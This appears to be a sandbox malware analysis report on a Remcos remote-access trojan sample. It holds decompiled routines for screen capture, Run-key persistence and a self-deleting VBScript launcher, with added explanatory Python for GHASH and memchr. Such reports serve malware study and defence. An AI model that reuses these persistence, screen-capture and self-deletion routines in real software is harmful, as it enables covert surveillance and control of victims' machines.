                    				if(_t150 != 0) {
                    					goto L3;
                    				} else {
                    					_t169 = _v16;
                    					goto L5;
                    				}
                    			}
                    • Instruction addresses for the listing above (side-by-side address column detached by extraction): 0x105b3f15 to 0x105b40fb
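Reading the listing above: the 16 bytes copied into `_v64` at entry are transformed by E105B316D; each input is then walked in 16-byte blocks (`len >> 4` full blocks, then `len & 0xf` tail bytes copied by E105C334E into a block zeroed with four stosd), every block is transformed by E105B316D, XORed into the accumulator at `_v32`, and the accumulator together with `_v64` is passed to E105B3DC3. The final step XORs both lengths shifted left by 3 (bytes to bits) into the two 64-bit halves, calls E105B3DC3 once more and copies `_a20` bytes of the result to `_a16`. That is the shape of GHASH, the polynomial hash inside AES-GCM, with `_v64` as the hash key H, E105B3DC3 as the GF(2^128) multiply and E105B316D most likely a byte-order conversion; those identifications are inferred from the structure and are not stated by the report. The Python below is an added reference implementation written for this page, not code recovered from the sample; the function names are mine. It is checked against test case 2 of the GCM specification, whose H and C intermediates are published, so the hash can be verified without an AES implementation.

```python
# Added reference GHASH (the universal hash inside AES-GCM), laid out to
# mirror the decompiled routine above.  Not code from the sample; names are
# mine.  Treating E105B3DC3 as the GF(2^128) multiply and the 16 bytes at
# _v64 as the hash key H is an inference from the listing's structure.

# GCM reduction constant for x^128 + x^7 + x^2 + x + 1 in GCM's reflected
# bit order (block bit 0 is the most significant bit of the integer).
R = 0xE1000000000000000000000000000000
MASK128 = (1 << 128) - 1


def gf128_mul(x: int, y: int) -> int:
    """Multiply two field elements (NIST SP 800-38D, Algorithm 1)."""
    z = 0
    v = x
    for i in range(128):
        if (y >> (127 - i)) & 1:   # bit i of y in GCM bit order
            z ^= v
        if v & 1:                  # v = v * x mod the polynomial
            v = (v >> 1) ^ R
        else:
            v >>= 1
    return z & MASK128


def _blocks(data: bytes):
    """Yield 16-byte blocks as integers; a short final block is zero-padded
    (the listing zero-fills 16 bytes, then memcpy's the tail into them).
    Big-endian integers stand in for the byte-order step E105B316D does."""
    for i in range(0, len(data), 16):
        yield int.from_bytes(data[i:i + 16].ljust(16, b"\x00"), "big")


def ghash(h: bytes, aad: bytes, ct: bytes) -> bytes:
    """GHASH_H(A, C).  In the listing, A is the buffer in edx with length
    _a4, C is _a8 with length _a12, and _a20 bytes of the result go to _a16."""
    hk = int.from_bytes(h, "big")
    y = 0
    for blk in _blocks(aad):            # first loop in the listing
        y = gf128_mul(y ^ blk, hk)
    for blk in _blocks(ct):             # second loop in the listing
        y = gf128_mul(y ^ blk, hk)
    # Length block: 64-bit bit-lengths of A and C.  The "<< 3" in the
    # listing is this byte-to-bit conversion.
    lengths = ((len(aad) * 8) << 64) | (len(ct) * 8)
    y = gf128_mul(y ^ lengths, hk)
    return y.to_bytes(16, "big")


def gcm_test_case_2() -> str:
    """GCM spec test case 2 (K = 0, IV = 0, one zero plaintext block).  H and
    C are the spec's published intermediates, so GHASH can be checked without
    an AES implementation."""
    h = bytes.fromhex("66e94bd4ef8a2c3b884cfa59ca342b2e")
    c = bytes.fromhex("0388dace60b6a392f328c2b971b2fe78")
    return ghash(h, b"", c).hex()
```

If the identification holds, the first buffer (pointer in edx, length `_a4`) is the additional authenticated data, the second (`_a8`, `_a12`) is the ciphertext, and the caller keeps the first `_a20` bytes of the result. GHASH on its own is not a tag: the caller still has to mask it with the encrypted initial counter block, and that step is outside this function.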

                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fce7a91475ddc2f1612e9a8a03468a5b99e4f47943d3026f662be594c0441147
                    • Instruction ID: 59f0c5b3463a5286e95d29dcdc162ce190a1261c66b0dd597203b9ceb6d88ea5
                    • Opcode Fuzzy Hash: fce7a91475ddc2f1612e9a8a03468a5b99e4f47943d3026f662be594c0441147
                    • Instruction Fuzzy Hash: 9161EC35E0060A9FDF08CFB9D4859EFBBB6EF8C210F11C529E526BB151DA746A058B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fce7a91475ddc2f1612e9a8a03468a5b99e4f47943d3026f662be594c0441147
                    • Instruction ID: 6a2ad8edffecebfcaae903e9719156c7a0c76254d9b187d9e67c469d6c3393be
                    • Opcode Fuzzy Hash: fce7a91475ddc2f1612e9a8a03468a5b99e4f47943d3026f662be594c0441147
                    • Instruction Fuzzy Hash: CB613C31E0021AABDF08DFB9D5815EFB7B2FF8C304F50812AE425BB250DA746A058B94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c845c6cc5c459e0427f3b6d9b164718d9ff2b4bcf1554f86a141997a7a1484ed
                    • Instruction ID: 7a46c63e6297807c5de7f1130092129a1d39734970edeb025e6968c5830d1d5b
                    • Opcode Fuzzy Hash: c845c6cc5c459e0427f3b6d9b164718d9ff2b4bcf1554f86a141997a7a1484ed
                    • Instruction Fuzzy Hash: 8F315A75A00115AFCB20CF59CD81B5AB7A9FF48354F1580B6ED04AB382D375EA64CB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E105C24DE(signed int _a4, signed char _a8, intOrPtr _a12) {
                    				intOrPtr _t13;
                    				void* _t14;
                    				signed char _t20;
                    				signed char _t24;
                    				signed int _t27;
                    				signed char _t32;
                    				unsigned int _t33;
                    				signed char _t35;
                    				signed char _t37;
                    				signed int _t39;
                    
                    				_t13 = _a12;
                    				if(_t13 == 0) {
                    					L11:
                    					return _t13;
                    				} else {
                    					_t39 = _a4;
                    					_t20 = _a8;
                    					if((_t39 & 0x00000003) == 0) {
                    						L5:
                    						_t14 = _t13 - 4;
                    						if(_t14 < 0) {
                    							L8:
                    							_t13 = _t14 + 4;
                    							if(_t13 == 0) {
                    								goto L11;
                    							} else {
                    								while(1) {
                    									_t24 =  *_t39;
                    									_t39 = _t39 + 1;
                    									if((_t24 ^ _t20) == 0) {
                    										goto L20;
                    									}
                    									_t13 = _t13 - 1;
                    									if(_t13 != 0) {
                    										continue;
                    									} else {
                    										goto L11;
                    									}
                    									goto L24;
                    								}
                    								goto L20;
                    							}
                    						} else {
                    							_t20 = ((_t20 << 8) + _t20 << 0x10) + (_t20 << 8) + _t20;
                    							do {
                    								_t27 =  *_t39 ^ _t20;
                    								_t39 = _t39 + 4;
                    								if(((_t27 ^ 0xffffffff ^ 0x7efefeff + _t27) & 0x81010100) == 0) {
                    									goto L12;
                    								} else {
                    									_t32 =  *(_t39 - 4) ^ _t20;
                    									if(_t32 == 0) {
                    										return _t39 - 4;
                    									} else {
                    										_t33 = _t32 ^ _t20;
                    										if(_t33 == 0) {
                    											return _t39 - 3;
                    										} else {
                    											_t35 = _t33 >> 0x00000010 ^ _t20;
                    											if(_t35 == 0) {
                    												return _t39 - 2;
                    											} else {
                    												if((_t35 ^ _t20) == 0) {
                    													goto L20;
                    												} else {
                    													goto L12;
                    												}
                    											}
                    										}
                    									}
                    								}
                    								goto L24;
                    								L12:
                    								_t14 = _t14 - 4;
                    							} while (_t14 >= 0);
                    							goto L8;
                    						}
                    					} else {
                    						while(1) {
                    							_t37 =  *_t39;
                    							_t39 = _t39 + 1;
                    							if((_t37 ^ _t20) == 0) {
                    								break;
                    							}
                    							_t13 = _t13 - 1;
                    							if(_t13 == 0) {
                    								goto L11;
                    							} else {
                    								if((_t39 & 0x00000003) != 0) {
                    									continue;
                    								} else {
                    									goto L5;
                    								}
                    							}
                    							goto L24;
                    						}
                    						L20:
                    						return _t39 - 1;
                    					}
                    				}
                    				L24:
                    			}

                    • Instruction addresses for the listing above (side-by-side address column detached by extraction): 0x105c24de to 0x105c258a
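The listing above is the classic word-at-a-time memchr: it scans byte by byte until the pointer is 4-byte aligned, replicates the search byte into all four lanes (`((c << 8) + c) << 16 + (c << 8) + c`), XORs each dword with that value so a matching byte becomes a zero lane, and uses `((w ^ 0xffffffff) ^ (0x7efefeff + w)) & 0x81010100` as a quick zero-lane test before confirming the four bytes individually. Those constants and that branch structure are the ones used by the Microsoft C runtime's memchr, so this is most likely statically linked CRT code rather than logic specific to the sample. The Python below is an added illustration of the technique, not code from the sample; the function names are mine, and because Python byte strings have no address the alignment step is relative to offset 0.

```python
# Added illustration of the word-at-a-time memchr whose constants appear in
# the listing above.  Not code from the sample; names are mine.
from typing import Optional

MAGIC = 0x7EFEFEFF      # listing: 0x7efefeff
MASK = 0x81010100       # listing: 0x81010100
M32 = 0xFFFFFFFF


def may_contain_zero_byte(w: int) -> bool:
    """The listing's dword pre-test.  Adding 0x7efefeff makes every non-zero
    byte carry into the next lane while a zero byte does not; comparing the
    carry-affected bits with ~w flags the lane after a zero byte.  The test
    never misses a zero byte, but the top lane can be flagged spuriously
    (0x80414243 is one such dword), which is why the listing re-checks the
    four bytes individually after a hit."""
    s = (w + MAGIC) & M32
    return (((~w) & M32) ^ s) & MASK != 0


def memchr(buf: bytes, c: int, n: int) -> Optional[int]:
    """Index of the first byte equal to c in buf[:n], or None."""
    n = min(n, len(buf))
    i = 0
    # Byte loop until the cursor is dword aligned (the `& 3` test in the listing).
    while i < n and i & 3:
        if buf[i] == c:
            return i
        i += 1
    # Replicate c into all four lanes.
    rep = c | (c << 8) | (c << 16) | (c << 24)
    while n - i >= 4:
        w = int.from_bytes(buf[i:i + 4], "little") ^ rep   # zero lane == match
        if may_contain_zero_byte(w):
            for k in range(4):                              # confirm lane by lane
                if buf[i + k] == c:
                    return i + k
            # Spurious hit from the carry chain: keep scanning.
        i += 4
    # Fewer than four bytes left: plain byte loop.
    while i < n:
        if buf[i] == c:
            return i
        i += 1
    return None
```

The byte-by-byte confirmation is not optional: the dword 0x80414243 contains no zero byte yet passes the quick test, because the carry out of the third lane flips the top bit of the fourth. The pre-test has no false negatives but does have false positives, so a memchr that returned on the quick test alone would be wrong.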

                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction ID: 03a296429e40b14eb78bb5bf5163ec856226d00c4aced2ee7a188afee175d477
                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction Fuzzy Hash: 1E115BF7A4004243D684C9E9E6F03B7AFAEEBC51E0729537AD04A4F658D522D9419600
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction ID: f68e5f41fa18727e6a735129a3979a796d7c5d5db83d10118ba36f39fff963d2
                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction Fuzzy Hash: F2113D7724018143D61486BEC9B95B7A3D5EBCE321F2D637BD0424B778D32AD945950C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 81%
                    			E00414906(void* __ecx, char __edx, void* __eflags, signed int _a4) {
                    				void* _v12;
                    				char _v13;
                    				struct HDC__* _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				int _v32;
                    				int _v36;
                    				struct HDC__* _v40;
                    				void* _v46;
                    				intOrPtr _v50;
                    				intOrPtr _v54;
                    				char _v56;
                    				char _v80;
                    				intOrPtr _v84;
                    				struct tagCURSORINFO _v100;
                    				signed int _v106;
                    				signed int _v108;
                    				long _v116;
                    				long _v120;
                    				char _v124;
                    				struct _ICONINFO _v144;
                    				char _v168;
                    				void* __ebx;
                    				int _t114;
                    				void* _t115;
                    				void* _t116;
                    				void* _t120;
                    				int _t127;
                    				void* _t128;
                    				signed char _t140;
                    				long _t146;
                    				void* _t147;
                    				int _t149;
                    				void* _t157;
                    				void* _t186;
                    				void* _t188;
                    				void* _t194;
                    				int _t199;
                    				void* _t204;
                    				void* _t223;
                    				signed int _t226;
                    				struct HDC__* _t228;
                    				struct HDC__* _t232;
                    				struct tagBITMAPINFO* _t234;
                    				void* _t235;
                    				int _t241;
                    
                    				_v13 = __edx;
                    				_t194 = __ecx;
                    				_t232 = CreateDCA("DISPLAY", 0, 0, 0);
                    				_v20 = _t232;
                    				_t228 = CreateCompatibleDC(_t232);
                    				_v40 = _t228;
                    				_v32 = E00414D3D( *((intOrPtr*)(0x46bd78 + _a4 * 4)));
                    				_t114 = E00414D89( *((intOrPtr*)(0x46bd78 + _a4 * 4)));
                    				_t199 = _v32;
                    				_v36 = _t114;
                    				if(_t199 != 0 || _t114 != 0) {
                    					_t115 = CreateCompatibleBitmap(_t232, _t199, _t114);
                    					_v12 = _t115;
                    					__eflags = _t115;
                    					if(_t115 != 0) {
                    						_t116 = SelectObject(_t228, _t115);
                    						__eflags = _t116;
                    						if(_t116 != 0) {
                    							_v28 = _v28 & 0x00000000;
                    							_v24 = _v24 & 0x00000000;
                    							E00414DCA( *((intOrPtr*)(0x46bd78 + _a4 * 4)),  &_v28);
                    							_t120 = StretchBlt(_t228, 0, 0, _v32, _v36, _t232, _v28, _v24, _v32, _v36, 0xcc0020);
                    							__eflags = _t120;
                    							if(_t120 == 0) {
                    								goto L7;
                    							}
                    							__eflags = _v13;
                    							if(_v13 != 0) {
                    								_v100.cbSize = 0x14;
                    								_t186 = GetCursorInfo( &_v100);
                    								__eflags = _t186;
                    								if(_t186 != 0) {
                    									_t188 = GetIconInfo(_v100.hCursor,  &_v144);
                    									__eflags = _t188;
                    									if(_t188 != 0) {
                    										_t241 = _v84 - _v144.yHotspot - _v24;
                    										__eflags = _t241;
                    										DeleteObject(_v144.hbmColor);
                    										DeleteObject(_v144.hbmMask);
                    										_t228 = _v40;
                    										DrawIcon(_t228, _v100.ptScreenPos - _v144.xHotspot - _v28, _t241, _v100.hCursor);
                    										_t232 = _v20;
                    									}
                    								}
                    							}
                    							_push( &_v124);
                    							_t127 = 0x18;
                    							_t128 = GetObjectA(_v12, _t127, ??);
                    							__eflags = _t128;
                    							if(_t128 == 0) {
                    								goto L7;
                    							} else {
                    								_t226 = _v106 * _v108 & 0x0000ffff;
                    								__eflags = _t226 - 1;
                    								if(_t226 != 1) {
                    									_push(4);
                    									_pop(1);
                    									_a4 = 1;
                    									__eflags = _t226 - 1;
                    									if(_t226 <= 1) {
                    										L24:
                    										__eflags = 1 << 1;
                    										_push(0x2eb6edc);
                    										L25:
                    										_t234 = LocalAlloc(0x40, ??);
                    										_t204 = 0x18;
                    										_t234->bmiHeader = 0x28;
                    										_t234->bmiHeader.biWidth = _v120;
                    										_t234->bmiHeader.biHeight = _v116;
                    										_t234->bmiHeader.biPlanes = _v108;
                    										_t234->bmiHeader.biBitCount = _v106;
                    										_t140 = _a4;
                    										__eflags = _t140 - _t204;
                    										if(_t140 < _t204) {
                    											__eflags = 1;
                    											_t234->bmiHeader.biClrUsed = 1 << _t140;
                    										}
                    										_t234->bmiHeader.biCompression = _t234->bmiHeader.biCompression & 0x00000000;
                    										_t234->bmiHeader.biClrImportant = _t234->bmiHeader.biClrImportant & 0x00000000;
                    										asm("cdq");
                    										_t227 = _t226 & 0x00000007;
                    										_t146 = (_t234->bmiHeader.biWidth + 7 + (_t226 & 0x00000007) >> 3) * (_a4 & 0x0000ffff) * _t234->bmiHeader.biHeight;
                    										_t234->bmiHeader.biSizeImage = _t146;
                    										_t147 = GlobalAlloc(0, _t146);
                    										_a4 = _t147;
                    										__eflags = _t147;
                    										if(_t147 != 0) {
                    											_t149 = GetDIBits(_t228, _v12, 0, _t234->bmiHeader.biHeight & 0x0000ffff, _t147, _t234, 0);
                    											__eflags = _t149;
                    											if(_t149 != 0) {
                    												_v56 = 0x4d42;
                    												_v54 = _t234->bmiHeader + _t234->bmiHeader.biSizeImage + _t234->bmiHeader.biClrUsed * 4 + 0xe;
                    												_v50 = 0;
                    												_t157 = _t234->bmiHeader + _t234->bmiHeader.biClrUsed * 4 + 0xe;
                    												__eflags = _t157;
                    												_v46 = _t157;
                    												E004020D5(_t194,  &_v80);
                    												E004020D5(_t194,  &_v168);
                    												E0040251D(_t194,  &_v80, _t227, __eflags,  &_v56, 0xe);
                    												E00403436( &_v80);
                    												E0040251D(_t194,  &_v80, _t227, __eflags, _t234, 0x28);
                    												E00403436( &_v80);
                    												_t235 = _a4;
                    												E0040251D(_t194,  &_v80, _t227, __eflags, _t235, _t234->bmiHeader.biSizeImage);
                    												E00403436( &_v80);
                    												DeleteObject(_v12);
                    												GlobalFree(_t235);
                    												DeleteDC(_v20);
                    												DeleteDC(_t228);
                    												E00402044(_t194, _t194, __eflags,  &_v168);
                    												E00401FC7();
                    												E00401FC7();
                    												goto L32;
                    											}
                    											DeleteDC(_v20);
                    											DeleteDC(_t228);
                    											DeleteObject(_v12);
                    											GlobalFree(_a4);
                    											goto L2;
                    										} else {
                    											_push(_v20);
                    											L8:
                    											DeleteDC();
                    											DeleteDC(_t228);
                    											_push(_v12);
                    											goto L5;
                    										}
                    									}
                    									_push(8);
                    									_pop(1);
                    									_a4 = 1;
                    									__eflags = _t226 - 1;
                    									if(_t226 <= 1) {
                    										goto L24;
                    									}
                    									_push(0x10);
                    									_pop(1);
                    									_a4 = 1;
                    									__eflags = _t226 - 1;
                    									if(_t226 <= 1) {
                    										goto L24;
                    									}
                    									_t223 = 0x18;
                    									__eflags = _t226 - _t223;
                    									if(_t226 > _t223) {
                    										_push(0x20);
                    										_pop(1);
                    										L23:
                    										_a4 = 1;
                    										goto L24;
                    									}
                    									_a4 = _t223;
                    									_push(0x28);
                    									goto L25;
                    								}
                    								goto L23;
                    							}
                    						}
                    						L7:
                    						_push(_t232);
                    						goto L8;
                    					} else {
                    						DeleteDC(_t232);
                    						DeleteDC(_t228);
                    						_push(0);
                    						L5:
                    						DeleteObject();
                    						goto L2;
                    					}
                    				} else {
                    					L2:
                    					E00402084(_t194, _t194, 0x45f6bc);
                    					L32:
                    					return _t194;
                    				}
                    			}

                    APIs
                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00414921
                    • CreateCompatibleDC.GDI32(00000000), ref: 0041492D
                      • Part of subcall function 00414D3D: GetMonitorInfoW.USER32(?,?), ref: 00414D5D
                      • Part of subcall function 00414D89: GetMonitorInfoW.USER32(?,?), ref: 00414DA9
                    • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0041497B
                    • DeleteDC.GDI32(00000000), ref: 0041498F
                    • DeleteDC.GDI32(00000000), ref: 00414992
                    • DeleteObject.GDI32(?), ref: 00414996
                    • SelectObject.GDI32(00000000,00000000), ref: 004149A0
                    • DeleteDC.GDI32(00000000), ref: 004149B1
                    • DeleteDC.GDI32(00000000), ref: 004149B4
                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 004149F0
                    • GetCursorInfo.USER32(?,?,?), ref: 00414A0B
                    • GetIconInfo.USER32(?,?), ref: 00414A1F
                    • DeleteObject.GDI32(?), ref: 00414A44
                    • DeleteObject.GDI32(?), ref: 00414A4D
                    • DrawIcon.USER32 ref: 00414A5C
                    • GetObjectA.GDI32(?,00000018,?), ref: 00414A70
                    • LocalAlloc.KERNEL32(00000040,00000001,?,?), ref: 00414AD6
                    • GlobalAlloc.KERNEL32(00000000,?,?,?), ref: 00414B3F
                    • GetDIBits.GDI32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 00414B63
                    • DeleteDC.GDI32(?), ref: 00414B76
                    • DeleteDC.GDI32(00000000), ref: 00414B79
                    • DeleteObject.GDI32(?), ref: 00414B7E
                    • GlobalFree.KERNEL32 ref: 00414B88
                    • DeleteObject.GDI32(?), ref: 00414C2D
                    • GlobalFree.KERNEL32 ref: 00414C34
                    • DeleteDC.GDI32(?), ref: 00414C43
                    • DeleteDC.GDI32(00000000), ref: 00414C46
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Delete$Object$Info$CreateGlobal$AllocCompatibleFreeIconMonitor$BitmapBitsCursorDrawLocalSelectStretch
                    • String ID: DISPLAY
                    • API String ID: 517350757-865373369
                    • Opcode ID: 6ff8cbcc277d7720571f848809e7628165d438946616432f88157e7f1d5e0bb6
                    • Instruction ID: 04b928e990297c4dc387ef5bf1f87de0b325f6e157068eb4714aaf8e6101e2a9
                    • Opcode Fuzzy Hash: 6ff8cbcc277d7720571f848809e7628165d438946616432f88157e7f1d5e0bb6
                    • Instruction Fuzzy Hash: 1DB17171900319AFDB10DFA0DC45BEEBBB8EF44756F00402AF949E7290DB74AA45CB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 98%
                    			E0040B0E2(char _a4) {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				char _v100;
                    				char _v124;
                    				char _v148;
                    				char _v172;
                    				short _v692;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				void* _t53;
                    				void* _t54;
                    				void* _t57;
                    				signed int _t61;
                    				void* _t62;
                    				void* _t78;
                    				void* _t79;
                    				void* _t92;
                    				void* _t93;
                    				signed char _t134;
                    				void* _t243;
                    				void* _t245;
                    				void* _t246;
                    				void* _t247;
                    
                    				E0041015B();
                    				if( *0x46a9d4 != 0x30) {
                    					E00409D73();
                    				}
                    				_t243 =  *0x46bd6b - 1; // 0x0
                    				if(_t243 == 0) {
                    					E0041537E(_t243);
                    				}
                    				if( *0x46ba75 != 0) {
                    					E00417754(E00401EEB(0x46c0e0));
                    				}
                    				_t231 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                    				_t245 =  *0x46bb02 - 1; // 0x1
                    				if(_t245 == 0) {
                    					E00410D5C(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", E00401EEB(0x46c4e8));
                    				}
                    				_t246 =  *0x46bafb - 1; // 0x0
                    				if(_t246 == 0) {
                    					E00410D5C(0x80000002, _t231, E00401EEB(0x46c4e8));
                    				}
                    				_t247 =  *0x46bb00 - 1; // 0x0
                    				if(_t247 == 0) {
                    					E00410D5C(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", E00401EEB(0x46c4e8));
                    				}
                    				_t53 = E00402489();
                    				_t54 = E00401F95(0x46c560);
                    				_t57 = E00410A30(E00401F95(0x46c518), "exepath",  &_v692, 0x208, _t54, _t53);
                    				_t248 = _t57;
                    				if(_t57 == 0) {
                    					GetModuleFileNameW(0,  &_v692, 0x208);
                    				}
                    				RegDeleteKeyA(0x80000001, E00401F95(0x46c518));
                    				_t61 = SetFileAttributesW( &_v692, 0x80);
                    				_t140 = 0x46c530;
                    				asm("sbb bl, bl");
                    				_t134 =  ~_t61 & 0x00000001;
                    				_t62 = E004074E4(_t248);
                    				_t249 = _t62;
                    				if(_t62 != 0) {
                    					_t140 = 0x46c530;
                    					SetFileAttributesW(E00401EEB(0x46c530), 0x80);
                    				}
                    				E004030A6(_t134,  &_v124, E0040427F(_t134,  &_v52, E0043987F(_t134, _t140, _t249, L"Temp")), 0, _t249, L"\\update.vbs");
                    				E00401EF0();
                    				E00404405(_t134,  &_v28, L"On Error Resume Next\n", _t249, E0040427F(_t134,  &_v52, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
                    				E00401EF0();
                    				_t250 = _t134;
                    				if(_t134 != 0) {
                    					E00403311(E004030A6(_t134,  &_v52, E00404405(_t134,  &_v76, L"while fso.FileExists(\"", _t250, E0040427F(_t134,  &_v100,  &_v692)), 0, _t250, L"\")\n"));
                    					E00401EF0();
                    					E00401EF0();
                    					E00401EF0();
                    				}
                    				E00403311(E004030A6(_t134,  &_v100, E004030A6(_t134,  &_v76, E0040427F(_t134,  &_v52, L"fso.DeleteFile \""), 0, _t250,  &_v692), 0, _t250, L"\"\n"));
                    				E00401EF0();
                    				E00401EF0();
                    				E00401EF0();
                    				_t251 = _t134;
                    				if(_t134 != 0) {
                    					E0040766C(_t134,  &_v28, 0, L"wend\n");
                    				}
                    				_t78 = E004074E4(_t251);
                    				_t252 = _t78;
                    				if(_t78 != 0) {
                    					E00403311(E004030A6(0x45f724,  &_v100, E00409E69( &_v76, L"fso.DeleteFolder \"", _t252, 0x46c530), 0, _t252, L"\"\n"));
                    					E00401EF0();
                    					E00401EF0();
                    				}
                    				_t79 = E0040427F(0x45f724,  &_v172, L"\"\"\", 0");
                    				E00403311(E004030A6(0x45f724,  &_v100, E00403030( &_v76, E00404429(0x45f724,  &_v52, E0040427F(0x45f724,  &_v148, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), _t252,  &_a4), _t79), 0, _t252, "\n"));
                    				E00401EF0();
                    				E00401EF0();
                    				E00401EF0();
                    				E00401EF0();
                    				E00401EF0();
                    				E0040766C(0x45f724,  &_v28, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
                    				_t92 = E00401EEB( &_v124);
                    				_t93 = E00402489();
                    				if(E00417947(E00401EEB( &_v28), _t93 + _t93, _t92, 0) != 0 && ShellExecuteW(0, L"open", E00401EEB( &_v124), 0x45f724, 0x45f724, 0) > 0x20) {
                    					ExitProcess(0);
                    				}
                    				E00401EF0();
                    				E00401EF0();
                    				return E00401EF0();
                    			}

                    APIs
                      • Part of subcall function 0041015B: TerminateProcess.KERNEL32(00000000,0046C500,0040D1DC), ref: 0041016B
                      • Part of subcall function 0041015B: WaitForSingleObject.KERNEL32(000000FF), ref: 0041017E
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B1DB
                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040B1EE
                    • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040B206
                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040B234
                      • Part of subcall function 00409D73: TerminateThread.KERNEL32(0040884B,00000000,0046C500,0040ADA3,?,0046C518,0046C500), ref: 00409D82
                      • Part of subcall function 00409D73: UnhookWindowsHookEx.USER32(00000000), ref: 00409D92
                      • Part of subcall function 00409D73: TerminateThread.KERNEL32(00408830,00000000,?,0046C518,0046C500), ref: 00409DA4
                      • Part of subcall function 00417947: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,0045F724,00000000,00000000,?,0040B0BC,00000000,00000000), ref: 00417986
                    • ShellExecuteW.SHELL32(00000000,open,00000000,0045F724,0045F724,00000000), ref: 0040B457
                    • ExitProcess.KERNEL32 ref: 0040B463
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                    • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Remcos$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                    • API String ID: 1861856835-219127200
                    • Opcode ID: 496a2bf8be3f90726c3cb8c66032a1cfb772c35640ea603dec4012a77cc14e90
                    • Instruction ID: 15120c8502facc1a94d34f6ce0dfcdb30145111763f7023834469a4ad8d2fcb5
                    • Opcode Fuzzy Hash: 496a2bf8be3f90726c3cb8c66032a1cfb772c35640ea603dec4012a77cc14e90
                    • Instruction Fuzzy Hash: 52915E31A101185ACB14FBA1DCA6AEF776AAF50744F10007FB806771E3EF785E4A869D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E0040FD95() {
                    				long _v8;
                    				char _v32;
                    				short _v556;
                    				short _v1076;
                    				short _v1596;
                    				short _v2116;
                    				void* _t27;
                    				void* _t28;
                    				void* _t31;
                    				long _t37;
                    				int _t41;
                    				long _t50;
                    				void* _t55;
                    				void* _t68;
                    				void* _t70;
                    				int _t71;
                    				void* _t72;
                    				long _t73;
                    				void* _t110;
                    				void* _t112;
                    				void* _t115;
                    				void* _t116;
                    
                    				_t71 = 0;
                    				_v8 = _t73;
                    				CreateMutexA(0, 1, "Mutex_RemWatchdog");
                    				GetModuleFileNameW(0,  &_v2116, 0x104);
                    				_t27 = E00402489();
                    				_t28 = E00401F95(0x46c560);
                    				_t108 = 0x46c518;
